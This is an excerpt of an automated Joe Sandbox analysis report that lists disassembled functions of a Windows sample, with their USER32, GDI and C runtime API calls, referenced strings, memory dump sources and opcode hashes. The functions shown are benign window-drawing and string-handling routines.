GetWindowRect.USER32(?,?), ref: 00216F7C
UnionRect.USER32(?,?,?), ref: 00216F87

Strings

83/, xrefs: 00216EEC, 00216F23

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window$Union
String ID: 83/
API String ID: 4061794321-2323854675
Opcode ID: a061dae1ec0f6e649b826c2580e6b16d709c6ca8437fa28f3a31331343d8425a
Instruction ID: c62e07164728287ca1ccee3dbe624c770a64bf6b75470d51297e08aa3ab6f71f
Opcode Fuzzy Hash: a061dae1ec0f6e649b826c2580e6b16d709c6ca8437fa28f3a31331343d8425a
Instruction Fuzzy Hash: 56415B75900209AFCB11DFA9C985CEEFBF9BF98300F24445AE506A7251DB30A995CF60

Function 001FA501 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 001FA564
OffsetRect.USER32(?,?,?), ref: 001FA5A0
FillRect.USER32(?,?), ref: 001FA5DE

Part of subcall function 001DEAAD: __EH_prolog3.LIBCMT ref: 001DEAB4

Strings

2, xrefs: 001FA536

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$FillH_prolog3OffsetWindow
String ID: 2
API String ID: 1391168360-3001879987
Opcode ID: afb354ca666f2385c3a43d302357d71b8ce2c9d4f8a281d7389e74ca30f7d2da
Instruction ID: 700db67b727f41509f24f79a6adb872b72dd2e6faa824e2066703515051391f9
Opcode Fuzzy Hash: afb354ca666f2385c3a43d302357d71b8ce2c9d4f8a281d7389e74ca30f7d2da
Instruction Fuzzy Hash: 64413E719006199FCF01EFA8D9859EFBBBAFF49310F14046AF905EB211CB719E058BA1

Function 001C5EF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 001C5F64
std::_Xinvalid_argument.LIBCPMT ref: 001C5F7F
_memmove.LIBCMT ref: 001C5FD5

Part of subcall function 001C6310: std::_Xinvalid_argument.LIBCPMT ref: 001C6328
Part of subcall function 001C6310: std::_Xinvalid_argument.LIBCPMT ref: 001C6346
Part of subcall function 001C6310: std::_Xinvalid_argument.LIBCPMT ref: 001C6361
Part of subcall function 001C6310: _memmove.LIBCMT ref: 001C63C5

Strings

string too long, xrefs: 001C5F5F, 001C5F7A

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 38ff1ea9a85cf6fe8e2be0f8d2425dfae97b37343f93d1948712fa0825718990
Instruction ID: ceef71024cb0b087ae805b74ef214d937282c52f815cd416954e4b1213088715
Opcode Fuzzy Hash: 38ff1ea9a85cf6fe8e2be0f8d2425dfae97b37343f93d1948712fa0825718990
Instruction Fuzzy Hash: D431D872304A108FD728996CE890F6AF3EBEFB17547604A2EF04687641D771ECC087A4

Function 001F2019 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 001F204A
FillRect.USER32(?,?), ref: 001F20FD

Strings

P13, xrefs: 001F2113

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: FillParentRect
String ID: P13
API String ID: 1540079046-3933245702
Opcode ID: 8e4b6f812c7155152909468d20f3cac786f8399599e1618a08d137162f5c48b5
Instruction ID: bdce754f958c945b12d4aa391450a0b8b6321f63e8e998697f3ca22cc43f70e5
Opcode Fuzzy Hash: 8e4b6f812c7155152909468d20f3cac786f8399599e1618a08d137162f5c48b5
Instruction Fuzzy Hash: 04319E32A04209ABCF05EFA5DCC9EAA77B9EF59310F150069FA05AB251DB71DD00CB60

Function 001FB6D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100windowCOMMON

Download Yara Rule

APIs

ReleaseCapture.USER32 ref: 001FB7F4

Part of subcall function 00275637: SetRectEmpty.USER32(?), ref: 0027568D
Part of subcall function 00275637: IsRectEmpty.USER32(?), ref: 00275697
Part of subcall function 00275637: SetRectEmpty.USER32(?), ref: 002756EE
Part of subcall function 00275637: SetRectEmpty.USER32(?), ref: 002756F4

IsWindowVisible.USER32(?), ref: 001FB711
GetParent.USER32(?), ref: 001FB744

Strings

2, xrefs: 001FB7A6

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: EmptyRect$CaptureParentReleaseVisibleWindow
String ID: 2
API String ID: 1768054721-3001879987
Opcode ID: f4eba0989c6a12cb2ebfe619dc0e633be623ff16d275bc518ae6a83f862088ee
Instruction ID: 918a6456919d96a759abe67a43927532cce68ce2cb8eb6c5b9ad5fd8c29e72e1
Opcode Fuzzy Hash: f4eba0989c6a12cb2ebfe619dc0e633be623ff16d275bc518ae6a83f862088ee
Instruction Fuzzy Hash: 0431C1313046009FD725AB2AD8CDFF9B7A6AF84700F19016DF28A872E1CF609C41CB81

Function 00219760 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON

Download Yara Rule

Strings

`2, xrefs: 00219837
LA/, xrefs: 002197FF
L>0, xrefs: 0021980F

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID:
String ID: L>0$LA/$`2
API String ID: 0-2202943792
Opcode ID: 570a90c133b93ea6b1044f9c358fb4af68107ff87424ea5e2776e52d15b88b78
Instruction ID: ff05d15b1d0f93e2e0fa9c3205b843a9f601bc91699db17a6b9d7b77e709d387
Opcode Fuzzy Hash: 570a90c133b93ea6b1044f9c358fb4af68107ff87424ea5e2776e52d15b88b78
Instruction Fuzzy Hash: 9631E5317387535A8B25AE318CE6FEB62E96FF2750F02003DE84AD6185DB50DDE18290

Function 002179AA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 002179B4

Part of subcall function 0024EBDB: __EH_prolog3.LIBCMT ref: 0024EBE2

Part of subcall function 001D5BF8: __EH_prolog3.LIBCMT ref: 001D5BFF

Part of subcall function 001D5BB6: __EH_prolog3.LIBCMT ref: 001D5BBD

Part of subcall function 0024E8FE: __EH_prolog3.LIBCMT ref: 0024E905

_free.LIBCMT ref: 00217AAC

Strings

MDITabsState, xrefs: 00217A9E
%sMDIClientArea-%d, xrefs: 002179F3

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3$H_prolog3_catch_free
String ID: %sMDIClientArea-%d$MDITabsState
API String ID: 276651542-353449602
Opcode ID: 1bb95ed5002c13592cd6b4adea0ef0edc2ba55494d510aee57f623d90481d6db
Instruction ID: 5ffeabcea9ab39594a5ab5b8ff471dafbda18dc14933b0436fc05a9bcb7ebea6
Opcode Fuzzy Hash: 1bb95ed5002c13592cd6b4adea0ef0edc2ba55494d510aee57f623d90481d6db
Instruction Fuzzy Hash: 74418C31900249EFDF05EFA4C885AEDBBB5AF29304F14409DF5466B292DB709E54CB61

Function 002958AF Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 002958B6

Part of subcall function 00297DE9: __EH_prolog3.LIBCMT ref: 00297DF0

Strings

dF/, xrefs: 0029593C
dI/, xrefs: 00295980
X*1, xrefs: 00295A04

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3
String ID: X*1$dF/$dI/
API String ID: 431132790-3128823163
Opcode ID: 3e000b40b572259f8b04c021432cbb1de8f63fcadeb9a272caff55773ac202d3
Instruction ID: 8d662a46fea27eae9fc3c32a14a6d7520062bfd16bb6e71c4b96826347fb16d3
Opcode Fuzzy Hash: 3e000b40b572259f8b04c021432cbb1de8f63fcadeb9a272caff55773ac202d3
Instruction Fuzzy Hash: F34106B4805B84DEC765EFB8C491BDBFBE4AF24305F10495EA5AE97282DB706608CF11

Function 001DC48F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON

Download Yara Rule

APIs

__snwprintf_s.LIBCMT ref: 001DC4DA
__snwprintf_s.LIBCMT ref: 001DC50C

Part of subcall function 002BE629: __getptd_noexit.LIBCMT ref: 002BE629

Strings

Afx:%p:%x, xrefs: 001DC4D0
Afx:%p:%x:%p:%p:%p, xrefs: 001DC502

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: __snwprintf_s$__getptd_noexit
String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
API String ID: 101746997-2801496823
Opcode ID: 0100dd05d3cb2ff6fdde985d1b26a1497eff9e3fe997966c6e90999ee4da3f6c
Instruction ID: 1214467ebf02bf4cd363a609bc3786889a966707b10089b8d6571eccb245fca1
Opcode Fuzzy Hash: 0100dd05d3cb2ff6fdde985d1b26a1497eff9e3fe997966c6e90999ee4da3f6c
Instruction Fuzzy Hash: E0311AB5900209AFCF11EFA5D8419DEBBB8EF68350F014427F904A7252D730AA21CFA1

Function 001C3F70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 001C3F8B

Part of subcall function 002D8541: std::exception::exception.LIBCMT ref: 002D8556
Part of subcall function 002D8541: __CxxThrowException@8.LIBCMT ref: 002D856B
Part of subcall function 002D8541: std::exception::exception.LIBCMT ref: 002D857C

std::_Xinvalid_argument.LIBCPMT ref: 001C3FA6

Strings

string too long, xrefs: 001C3F86, 001C3FA1

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: 1d65e31d54ec7489955ddd6a3c65a7ee73a68f625451e93bd654bcb8cd8ffd0a
Instruction ID: cdee4096de8fec872999a03ba422af088ed08e4295b594cecbf6b15d0c0e4c20
Opcode Fuzzy Hash: 1d65e31d54ec7489955ddd6a3c65a7ee73a68f625451e93bd654bcb8cd8ffd0a
Instruction Fuzzy Hash: 512128327482404BD3359E5CA8A0FAAF7E9EF75720B110A1FF5928B681C7A2DC548791

Function 00234B04 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetObjectW.GDI32(?,00000018,?), ref: 00234B2F
IntersectRect.USER32(00000000,?,00000000), ref: 00234B97

Strings

NR#, xrefs: 00234BC8
TR/, xrefs: 00234BDC

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: IntersectObjectRect
String ID: NR#$TR/
API String ID: 3895296623-700879352
Opcode ID: b1088a867b2134412b324f7454adb3a75b03d080a4170be3eea6f654fa370dcc
Instruction ID: b112c5acb3cdb8ad4c371a842437a08e115cbe7b8063b2d3097ebf2224d4560a
Opcode Fuzzy Hash: b1088a867b2134412b324f7454adb3a75b03d080a4170be3eea6f654fa370dcc
Instruction Fuzzy Hash: DB314DB1D10219AFCF14DFA9D845AEEFBB9EF49310F14415AE505E6280DB70AA14CF60

Function 0020BDCC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0020B291: GetParent.USER32(?), ref: 0020B29D
Part of subcall function 0020B291: GetParent.USER32(00000000), ref: 0020B2A0

Part of subcall function 001DCBFE: GetWindowLongW.USER32(?,000000F0), ref: 001DCC09

swprintf.LIBCMT ref: 0020BE5E
lstrlenW.KERNEL32(?), ref: 0020BE70
lstrlenW.KERNEL32(?), ref: 0020BE7F

Strings

:%d, xrefs: 0020BE53

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Parentlstrlen$LongWindowswprintf
String ID: :%d
API String ID: 1122082503-1955712242
Opcode ID: 778c70d9fe1c5230947e7d89408b82faf56d6d848631d4d62cc77614c57a4298
Instruction ID: a734d6289eb74c9d5463e77c2bc47f5dd83b2bc57292af41956a3ec97c3c5377
Opcode Fuzzy Hash: 778c70d9fe1c5230947e7d89408b82faf56d6d848631d4d62cc77614c57a4298
Instruction Fuzzy Hash: 8D21A6719102049BDB21EB64CD85EEF73BCEF58304F840569F605A7292DB34EA50CB54

Function 0021040B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

Part of subcall function 0024C168: __EH_prolog3.LIBCMT ref: 0024C16F
Part of subcall function 0024C168: EnterCriticalSection.KERNEL32(00336EB4,00000000,001EC29A,00000001), ref: 0024C1CB
Part of subcall function 0024C168: __beginthread.LIBCMT ref: 0024C1E5
Part of subcall function 0024C168: SetThreadPriority.KERNEL32(00000000,000000FF), ref: 0024C1FE
Part of subcall function 0024C168: LeaveCriticalSection.KERNEL32(00336EB4), ref: 0024C215

Part of subcall function 001DCD55: ShowWindow.USER32(00000000,?,?,001CC2F5,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 001DCD66

IsWindow.USER32(?), ref: 002104DB
InvalidateRect.USER32(?,00000054,00000001,?,00000000,00000000,00210742), ref: 002104F1
UpdateWindow.USER32(?), ref: 002104FD

Strings

<L/, xrefs: 00210418

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$CriticalSection$EnterH_prolog3InvalidateLeavePriorityRectShowThreadUpdate__beginthread
String ID: <L/
API String ID: 701223984-623769782
Opcode ID: 2768bdb6196ce3ebd6dd75b0274af80021459666de704737cd0aa064388f8f69
Instruction ID: f7c00ead976e1b656683552ec39c3d34bb15c2f04321df8e155bbc81bfdbdcf7
Opcode Fuzzy Hash: 2768bdb6196ce3ebd6dd75b0274af80021459666de704737cd0aa064388f8f69
Instruction Fuzzy Hash: 8521B4313106009FCB25AF64C895EEEB7E6BFA8B00F14446DF14987296DBB1A891CB91

Function 0023B240 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0023B247

Part of subcall function 0021EA58: __EH_prolog3.LIBCMT ref: 0021EA5F
Part of subcall function 0021EA58: SetRectEmpty.USER32(?), ref: 0021EAF5

Part of subcall function 00275176: SetRectEmpty.USER32(?), ref: 002751A8
Part of subcall function 00275176: SetRectEmpty.USER32(?), ref: 002751AF

SetRectEmpty.USER32(?), ref: 0023B32D
SetRectEmpty.USER32(?), ref: 0023B356

Strings

`2, xrefs: 0023B34C

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: EmptyRect$H_prolog3
String ID: `2
API String ID: 3752103406-2259872102
Opcode ID: f66fd0cac1f0333b7680ed5d24940a7978f0e34eb76a425c3fcb7dfaab970318
Instruction ID: cc1b1eb7e10aafaea71b5b2821d8acdfc5ff1ceec2d85474fb15dc5bcd7eabd9
Opcode Fuzzy Hash: f66fd0cac1f0333b7680ed5d24940a7978f0e34eb76a425c3fcb7dfaab970318
Instruction Fuzzy Hash: F94143B0805B84CFC3659F3A89896C6FBE0BF19300F90892ED1AE8B301DBB06554CF85

Function 001DF457 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(DWMAPI,?,?,00000000,?,?,?,?,?,?,?,?,00215927), ref: 001DF4CE
GetProcAddress.KERNEL32(00000000,DwmInvalidateIconicBitmaps), ref: 001DF4DE

Strings

DWMAPI, xrefs: 001DF4C9
DwmInvalidateIconicBitmaps, xrefs: 001DF4D8

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: DWMAPI$DwmInvalidateIconicBitmaps
API String ID: 1646373207-1098356003
Opcode ID: 9046c24f7b87fc39d39edc371493c5ba57ec2644c18933ae55325fbc246f3757
Instruction ID: 3b66025d5cb54465b56c730508263472eb673941918c80442806e6c08032c296
Opcode Fuzzy Hash: 9046c24f7b87fc39d39edc371493c5ba57ec2644c18933ae55325fbc246f3757
Instruction Fuzzy Hash: 5E115172A002059BCB11DF799C88AAB77E9EF49340B15057DA90BEB241DF71DE41CB60

Function 001CCE2F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 001CCE54
GetSysColor.USER32(00000014), ref: 001CCE9E
CreateDIBitmap.GDI32(?,00000028,00000004,?,00000028,00000000), ref: 001CCEF1

Strings

(, xrefs: 001CCE82

Memory Dump Source

